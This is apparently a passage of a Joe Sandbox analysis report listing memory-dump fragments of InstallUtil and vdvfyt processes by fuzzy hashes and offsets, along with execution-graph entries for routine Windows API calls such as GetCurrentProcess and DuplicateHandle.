                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7cdbfd90478c96fd0d4b3f324e27ae3da27df50e8e146d31d47319ef2bc0fa75
                                                                                                            • Instruction ID: a2a649db0167278deac1304beacff488c35a7648c7be9989cc264eb12edf3c66
                                                                                                            • Opcode Fuzzy Hash: 7cdbfd90478c96fd0d4b3f324e27ae3da27df50e8e146d31d47319ef2bc0fa75
                                                                                                            • Instruction Fuzzy Hash: 0D21AE75F216159FDB44EFA9E880BAEBBF5AB48710F148065E905E7381E730D8418FA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ae933dbec17ef40ff5e434e68b40b103a756ee9e116495a0d03b89a4099d4eb0
                                                                                                            • Instruction ID: 86a1864aa6c3f41911b7641a27eaf5e2313e5ba12f8611ac62aa47c56bba829d
                                                                                                            • Opcode Fuzzy Hash: ae933dbec17ef40ff5e434e68b40b103a756ee9e116495a0d03b89a4099d4eb0
                                                                                                            • Instruction Fuzzy Hash: 48218031A207069FDB75DFA5D8C1ABFB7F2FB85200F104929D596AB550D330A845CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a59647031c0ca7387168243ac89f443e6623980789b4b9442993da8d78049024
                                                                                                            • Instruction ID: f660f4e727efe95a4c60caa9d3a7515f11366059af8f3377635a58166eb280f6
                                                                                                            • Opcode Fuzzy Hash: a59647031c0ca7387168243ac89f443e6623980789b4b9442993da8d78049024
                                                                                                            • Instruction Fuzzy Hash: E721A175F216169FDB44EFAAD880AAEBBF1FB48710F148065E905E7390E730D8408F95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3359563717.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_a9d000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bcc2a8b64329aa6eefdc78703c28c65e0753cd40175ddf25fc16f6c5d9b99642
                                                                                                            • Instruction ID: 7b1a2e57e426ed3398e97476396b290b0941903e030517cf7e3917d95c396f62
                                                                                                            • Opcode Fuzzy Hash: bcc2a8b64329aa6eefdc78703c28c65e0753cd40175ddf25fc16f6c5d9b99642
                                                                                                            • Instruction Fuzzy Hash: 5F21C572604244EFDF05DF14D9C0B26BFA5FBD4724F24C56DE9090B256C336E896CAA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3360437655.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_cad000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a71047a97c2063f8e94122718045277e7311cb2ef1ee574df5ebd5550ae6c8f
                                                                                                            • Instruction ID: ce08f5d9632e6220b88ab55354ae8ff365323e31f55ba6135192a2bd9a1951af
                                                                                                            • Opcode Fuzzy Hash: 9a71047a97c2063f8e94122718045277e7311cb2ef1ee574df5ebd5550ae6c8f
                                                                                                            • Instruction Fuzzy Hash: 4C213471604305EFCB10DF14D9C0B26BBA1FB85318F20C56DD90B0B682C33AD847CA62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3360437655.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_cad000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 34188fdff48eb3aceb38fbe44169b025fd05177a0b6af5eb198135474831320f
                                                                                                            • Instruction ID: d3d8c820410851d8c2d12375318c86d5c81fcc2685adb609638774424d7f3845
                                                                                                            • Opcode Fuzzy Hash: 34188fdff48eb3aceb38fbe44169b025fd05177a0b6af5eb198135474831320f
                                                                                                            • Instruction Fuzzy Hash: CD214D7550D7C09FCB03CF24D990711BF71AB47214F2985DBD88A8F6A7C23A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b31eca0043963ccaadb23cff0941041b64588713e4a7906709ebc06d4894eab5
                                                                                                            • Instruction ID: 0c04b38d40ab9ea5ff754eeebd07f3bdcda71a91b54d706d3698e98fcb6603b2
                                                                                                            • Opcode Fuzzy Hash: b31eca0043963ccaadb23cff0941041b64588713e4a7906709ebc06d4894eab5
                                                                                                            • Instruction Fuzzy Hash: 02218731B211199FDF48EB69E890B9EB7F6EF85310F108475E805D7345DB319D418B80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f4219f83c84f4c970e98059e5a9c5b47160d277d6d366b3ddc7c1efc70b329f
                                                                                                            • Instruction ID: 1b4d05d5b11b476855440e6e3b7dfb186779d3dc7536e1136778b5320a2cdae4
                                                                                                            • Opcode Fuzzy Hash: 9f4219f83c84f4c970e98059e5a9c5b47160d277d6d366b3ddc7c1efc70b329f
                                                                                                            • Instruction Fuzzy Hash: D7116071E102199BCF5CEBAAD8915DEB7B5EB89310F108569E50AEB340DA319A40CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5cd24a7ce6ae173d7f6d4f792cc5c32eb77bd971b965d5b6834ac9149103d28
                                                                                                            • Instruction ID: 48d506f532122d3a2967b927580ef1c5f4112752a893b3b6e2b931335b6d851f
                                                                                                            • Opcode Fuzzy Hash: d5cd24a7ce6ae173d7f6d4f792cc5c32eb77bd971b965d5b6834ac9149103d28
                                                                                                            • Instruction Fuzzy Hash: 3111C431B201268FDF58EA69D8106AF73EAEBC9351F144539D806E7384EE75DC018BD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3359563717.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_a9d000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                            • Instruction ID: 3bb5202ae9d42aecfa203b49ac74a5b9523e9ccb434cc21b94a2841e09264f69
                                                                                                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                            • Instruction Fuzzy Hash: 9711E676504244DFCF05CF10D5C4B16BFB2FB94324F24C5A9D8090B656C33AE89ACBA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 147fa555de6ec635fee5523d6db3ccd955fd2aef9d12fa471a55c279262a972e
                                                                                                            • Instruction ID: 645ef0e46f9190e1463f1084fda884e46b67dffa00ea8eb043515665511f2896
                                                                                                            • Opcode Fuzzy Hash: 147fa555de6ec635fee5523d6db3ccd955fd2aef9d12fa471a55c279262a972e
                                                                                                            • Instruction Fuzzy Hash: 1C01F535B111424FDBAAE67D945131A77E6DBC5310F10883AF90ACB391E965CC024381
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c8ee5d469e6faeeee694aee0d6bb2875b4d194b74b2927a6fa2fc178f3c915a
                                                                                                            • Instruction ID: ce5cc3cd43fdbe4053be1c044732cbbc96e4eb94ad930fc2a7ba3b0e977787c8
                                                                                                            • Opcode Fuzzy Hash: 7c8ee5d469e6faeeee694aee0d6bb2875b4d194b74b2927a6fa2fc178f3c915a
                                                                                                            • Instruction Fuzzy Hash: AD2113B5D01259DFCB00DF9AD884A9EFBB4FB48310F10862AE918A3240C3746550CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 34625d32b2ebcec5766e0e8f1e17d969176c438faec2863a3cd1e0bdc7025997
                                                                                                            • Instruction ID: 5e3db17ace3433087349163c2b5635575b29dd10b458b76211555620c6f99fef
                                                                                                            • Opcode Fuzzy Hash: 34625d32b2ebcec5766e0e8f1e17d969176c438faec2863a3cd1e0bdc7025997
                                                                                                            • Instruction Fuzzy Hash: AC11CCB1D01259AFCB00DF9AD884ACEFBB8FB48310F10812AE918A7300C375A954CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61281c8daecae5144073466f4432dfc5b4d22d77b671a8cb247138cae2c0c524
                                                                                                            • Instruction ID: a26766e622593c6b014000aae1cb01fa22333dfceb64dc8e49fa9f675d10a0d5
                                                                                                            • Opcode Fuzzy Hash: 61281c8daecae5144073466f4432dfc5b4d22d77b671a8cb247138cae2c0c524
                                                                                                            • Instruction Fuzzy Hash: A5018635B114165BDF69E56E945571FB3EADBC9710F108839F90ACB380ED66DC0243D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f6c044452282e346cbcf4db6b82aca46b6b127e78fbbf1a074d5774ce19ccbf
                                                                                                            • Instruction ID: b18af2e8957f094df5a851b9fe41d35cf2c0314a3b5941bd06a9f8d50dd62a2d
                                                                                                            • Opcode Fuzzy Hash: 1f6c044452282e346cbcf4db6b82aca46b6b127e78fbbf1a074d5774ce19ccbf
                                                                                                            • Instruction Fuzzy Hash: 9E014772B215010FDBA6FA3CD95135F3BE2DB8A310F008869F40ACB345ED21DC428380
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a671b356602b64058591b03185e9309e1f4791e3ae12c2703c328fbe01ade23a
                                                                                                            • Instruction ID: 96588e5ffda9bd7d65bf4b254f80a3b6e376665f627aba3bf0b7b8a403ed2b9f
                                                                                                            • Opcode Fuzzy Hash: a671b356602b64058591b03185e9309e1f4791e3ae12c2703c328fbe01ade23a
                                                                                                            • Instruction Fuzzy Hash: DE018135B200120BEF69A57C949072E67EBEBC9720F108839F50ACB340EE21DC024781
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a845cf68a8e4b67f5f7785321ecb6c0459b8ac6be47db703693ad24fc5beaf44
                                                                                                            • Instruction ID: de8957aac34502bf38409cbdfddd17f8fdbd2f493fd4cea87a35cc145600a6b1
                                                                                                            • Opcode Fuzzy Hash: a845cf68a8e4b67f5f7785321ecb6c0459b8ac6be47db703693ad24fc5beaf44
                                                                                                            • Instruction Fuzzy Hash: D001A732B201664BDF88E569D8106EF73EBEBC8211F18453AD806D7284EE708C028BD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: acd4031cb63ce3172c4705d26825e8af9d732cb5642dba74c606bac3e987d6a1
                                                                                                            • Instruction ID: 2e1ce23a30a0024c2f0057f375036345e6e116e433754e5a19df1b81bb5abe4e
                                                                                                            • Opcode Fuzzy Hash: acd4031cb63ce3172c4705d26825e8af9d732cb5642dba74c606bac3e987d6a1
                                                                                                            • Instruction Fuzzy Hash: 95018175B200124BEF69AA7CD49172E63E7EBC9720F158839E50ADB340EE21DC024781
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2890bd46a9fc42b635b95c0fca2bacc77115dc0ac6a45c028db6bfa2e57066b1
                                                                                                            • Instruction ID: bbe24b9c9fb769ef54879fbcc4f56448b5c33cef037512693fabfa15247c166c
                                                                                                            • Opcode Fuzzy Hash: 2890bd46a9fc42b635b95c0fca2bacc77115dc0ac6a45c028db6bfa2e57066b1
                                                                                                            • Instruction Fuzzy Hash: 62018131B615114BDB69BA7CD85175F77EAEB89710F108828F90ACB344EE21DC428780
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6ae55e8a8b57fc663813d86a4746e8c8472c6072d12cfc2dadc4141330cd632
                                                                                                            • Instruction ID: eb47b89db62fc4ecf6d19f5c9d7fa044dbbc28a90ce0c991ce31ad0d4abbae97
                                                                                                            • Opcode Fuzzy Hash: a6ae55e8a8b57fc663813d86a4746e8c8472c6072d12cfc2dadc4141330cd632
                                                                                                            • Instruction Fuzzy Hash: 1C01F432F211259BCF58AA69E84169DB376EB84710F108439EA05E7341DB31AC0087C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b9c87f95f153c62a2f7dd2dc2628d709f82e6f1519b75272914406f67166f026
                                                                                                            • Instruction ID: 31a3499a88fdd2087301e33cdb1cfa7e6a5caa5565c95ea3d307651d5f9d13be
                                                                                                            • Opcode Fuzzy Hash: b9c87f95f153c62a2f7dd2dc2628d709f82e6f1519b75272914406f67166f026
                                                                                                            • Instruction Fuzzy Hash: 39F08C35A302028BEF6CBA58A9913A87BB5EB80354F1044AADD05DB246D779D901C741
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9bc1e2f321bee31a1aba4060dfdb6c167d37693f4500e3227997ef658440d59b
                                                                                                            • Instruction ID: ede058e9f685302fae1b6533ceb6c65ffa8a93c6d037beb23c82595a04bebe07
                                                                                                            • Opcode Fuzzy Hash: 9bc1e2f321bee31a1aba4060dfdb6c167d37693f4500e3227997ef658440d59b
                                                                                                            • Instruction Fuzzy Hash: A3E012B1D292899FDFA5DB708A053997BB5E703214F2549AAC804D7142E176CE45CB41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f241681e0339d1f1bf582887a8a79e7dfeeb4e745bcc684eb0e5fe3ccdb9de8c
                                                                                                            • Instruction ID: 0c85f78ccb8719a56812b38499d95676c6fd2d71805bada4a4b911984fffbfff
                                                                                                            • Opcode Fuzzy Hash: f241681e0339d1f1bf582887a8a79e7dfeeb4e745bcc684eb0e5fe3ccdb9de8c
                                                                                                            • Instruction Fuzzy Hash: 9EE0C271E2020EABDF64EFB0C90579E73ACD702304F2088A5DC08C7202E272CA01CB80

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:14
                                                                                                            Total number of Limit Nodes:3
                                                                                                            execution_graph 14452 2f1f030 DuplicateHandle 14453 2f1f0c6 14452->14453 14458 2f1e9e0 14459 2f1ea26 GetCurrentProcess 14458->14459 14461 2f1ea71 14459->14461 14462 2f1ea78 GetCurrentThread 14459->14462 14461->14462 14463 2f1eab5 GetCurrentProcess 14462->14463 14464 2f1eaae 14462->14464 14465 2f1eaeb GetCurrentThreadId 14463->14465 14464->14463 14467 2f1eb44 14465->14467 14454 2f1c938 14455 2f1c980 GetModuleHandleW 14454->14455 14456 2f1c97a 14454->14456 14457 2f1c9ad 14455->14457 14456->14455

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F1EA5E
                                                                                                            • GetCurrentThread.KERNEL32 ref: 02F1EA9B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F1EAD8
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02F1EB31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360924910.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2f10000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: d3e7fa95b66182cbafd1eaf6b437af6a2b2d7ddd937f52736736f9fb1cbde568
                                                                                                            • Instruction ID: 844562d9b38175ca0fb285a74a330e362b0b307638bbc2ad70b29f7df6e11188
                                                                                                            • Opcode Fuzzy Hash: d3e7fa95b66182cbafd1eaf6b437af6a2b2d7ddd937f52736736f9fb1cbde568
                                                                                                            • Instruction Fuzzy Hash: 895135B0900749DFDB54CFAAD548BDEBBF1FB88304F208059E509A73A0DB749948CB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 21 2f1f030-2f1f0c4 DuplicateHandle 22 2f1f0c6-2f1f0cc 21->22 23 2f1f0cd-2f1f0ea 21->23 22->23
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F1F0B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360924910.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2f10000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e929b30c15d6a7de4ac7a121c8cae649e19eaf8eb8a1b145c4d2e85bfea96f80
                                                                                                            • Instruction ID: 0ac2e52fe50b13518aa4e7791465d9c572824082b9ab26a4654e5b5da84356e1
                                                                                                            • Opcode Fuzzy Hash: e929b30c15d6a7de4ac7a121c8cae649e19eaf8eb8a1b145c4d2e85bfea96f80
                                                                                                            • Instruction Fuzzy Hash: EF21E4B5900348EFDB10CFAAD984ADEFBF9EB48710F14801AE914A3310C378A944CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 26 2f1c938-2f1c978 27 2f1c980-2f1c9ab GetModuleHandleW 26->27 28 2f1c97a-2f1c97d 26->28 29 2f1c9b4-2f1c9c8 27->29 30 2f1c9ad-2f1c9b3 27->30 28->27 30->29
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02F1C99E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360924910.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2f10000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 270f42cdd6be3219808bda3db722c21acfd18577097926be4148cab904ea01b2
                                                                                                            • Instruction ID: 083f46cf59f56e311125d757acccbde5e886367f1a6a7015b7f51dfa1e066852
                                                                                                            • Opcode Fuzzy Hash: 270f42cdd6be3219808bda3db722c21acfd18577097926be4148cab904ea01b2
                                                                                                            • Instruction Fuzzy Hash: 701110B5C00749CFDB10CF9AC444BDEFBF5AB88314F10841AD919A7210C379A545CFA2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1192 15cd4a0-15cd4b2 1193 15cd4b8 1192->1193 1194 15cd546-15cd54d 1192->1194 1195 15cd4ba-15cd4c6 1193->1195 1194->1195 1196 15cd4cc-15cd4ee 1195->1196 1197 15cd552-15cd557 1195->1197 1199 15cd55c-15cd571 1196->1199 1200 15cd4f0-15cd50e 1196->1200 1197->1196 1205 15cd528-15cd530 1199->1205 1202 15cd516-15cd526 1200->1202 1204 15cd57e 1202->1204 1202->1205 1206 15cd532-15cd543 1205->1206 1207 15cd573-15cd57c 1205->1207 1207->1206
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360528240.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_15cd000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e225e62e53cfeee620595956a8e4389d7572ca242eb86b0a4d49806fed63e779
                                                                                                            • Instruction ID: c90156df80e04303e7824d5a8c6929bb7e7ead0bd365d41a87c123db164ec4c8
                                                                                                            • Opcode Fuzzy Hash: e225e62e53cfeee620595956a8e4389d7572ca242eb86b0a4d49806fed63e779
                                                                                                            • Instruction Fuzzy Hash: BD212172500200EFDB01DF98D9C0B2ABFB1FB98718F20857DE9098E256C376D446CAE2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1209 2d8d01c-2d8d02e 1210 2d8d0bd-2d8d0c4 1209->1210 1211 2d8d034 1209->1211 1212 2d8d036-2d8d042 1210->1212 1211->1212 1214 2d8d048-2d8d06a 1212->1214 1215 2d8d0c9-2d8d0ce 1212->1215 1216 2d8d06c-2d8d086 1214->1216 1217 2d8d0d3-2d8d0e8 1214->1217 1215->1214 1220 2d8d08e-2d8d09d 1216->1220 1221 2d8d09f-2d8d0a7 1217->1221 1220->1221 1222 2d8d0f5 1220->1222 1223 2d8d0a9-2d8d0ba 1221->1223 1224 2d8d0ea-2d8d0f3 1221->1224 1224->1223
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360673040.0000000002D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D8D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2d8d000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a675ff28c656d57aaf18703f6eec9b2b111f83978e2681634a2514ae08d0f6d6
                                                                                                            • Instruction ID: 9d2c44b6d1d72a4d828dca2a39f9858d569d9eebabeb4388284aa087618ee798
                                                                                                            • Opcode Fuzzy Hash: a675ff28c656d57aaf18703f6eec9b2b111f83978e2681634a2514ae08d0f6d6
                                                                                                            • Instruction Fuzzy Hash: 2521D071604204EFDB14EF24E980B26BB66EB84314F30C56DE94A4B3C6C33AD846CA62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360673040.0000000002D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D8D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2d8d000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: df87caed88b434445091612d1a1c255125e6ecaedd6274b48d6d063f21e901f7
                                                                                                            • Instruction ID: 7f6410edf2546c3c35958d7341b3cb935de8dff2facbddfc07b39dfecc1d3336
                                                                                                            • Opcode Fuzzy Hash: df87caed88b434445091612d1a1c255125e6ecaedd6274b48d6d063f21e901f7
                                                                                                            • Instruction Fuzzy Hash: 8B2180755093809FCB12DF20D590715BF72EB46214F28C5DAD8898F2E7C33A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360528240.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_15cd000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
